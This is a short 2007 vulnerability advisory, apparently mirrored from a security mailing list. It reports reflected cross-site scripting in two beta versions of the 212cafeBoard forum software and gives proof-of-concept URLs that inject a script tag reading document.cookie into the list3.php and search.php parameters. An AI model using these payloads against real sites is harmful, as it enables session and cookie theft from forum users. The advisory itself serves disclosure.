Computer Security

Security Advisory: XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  webchat File Include Vulnerability

From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:22.01.2007
Subject:XSS in 212cafeBoard ( Verision 0.08 & 6.30 Beta )

Hello

Vulnerable : 212cafeBoard
Version: 0.08 Beta
        6.30 Beta
Web : http://www.212cafe.com


i found XSS 212cafeBoard v6.30 Beta :


http://www.example.com/Board/list3.php?user=[XSS]

For Example , you can put :
http://www.example.com/board/list3.php?user='><script>alert(docu
ment.cookie);</script>

-----------------
and i found XSS in 212cafeBoard v0.08 beta


http://www.example.com/board/search.php?keyword=[XSS]

For Example :
http://www.example.com/board/search.php?keyword='><script>alert(
document.cookie);</script>


-------------------
Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server